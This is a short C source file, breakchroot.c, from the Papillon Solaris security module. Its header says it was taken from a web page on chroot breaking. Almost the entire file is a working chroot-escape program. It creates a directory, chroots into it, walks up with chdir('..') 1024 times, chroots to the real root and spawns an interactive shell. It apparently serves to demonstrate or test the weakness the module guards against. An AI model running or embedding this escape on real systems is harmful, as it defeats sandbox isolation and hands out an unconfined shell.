/*
 * Papillon - Solaris security module -  http://www.roqe.org/papillon
 * $Id: breakchroot.c,v 1.2 2001/11/07 16:38:31 kr Exp $
 * 
 * Taken from
 * http://www.bpfh.net/simes/computing/chroot-break.html 
 */

#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define TEMP_DIR ".outbreak"

int main()
{
    int x;
    struct stat sbuf;

    if (stat(TEMP_DIR, &sbuf) < 0) {
	if (errno == ENOENT) {
	    if (mkdir(TEMP_DIR, 0755) < 0) {
		fprintf(stderr, "Failed to create %s - %s\n", TEMP_DIR,
			strerror(errno));
		exit(1);
	    }
	} else {
	    fprintf(stderr, "Failed to stat %s - %s\n", TEMP_DIR,
		    strerror(errno));
	    exit(1);
	}
    } else if (!S_ISDIR(sbuf.st_mode)) {
	fprintf(stderr, "Error - %s is not a directory!\n", TEMP_DIR);
	exit(1);
    }

    if (chroot(TEMP_DIR) < 0) {
	fprintf(stderr, "Failed to chroot to %s - %s\n", TEMP_DIR,
		strerror(errno));
	exit(1);
    }

    /*
     * Reverse traverse.
     */
    for (x = 0; x < 1024; x++)
	chdir("..");

    chroot(".");

    /*
     * Execute a shell
     */
    if (execl("/bin/sh", "-i", NULL) < 0) {
	fprintf(stderr, "Failed to exec - %s\n", strerror(errno));
	exit(1);
    }
    
    return 0;
}
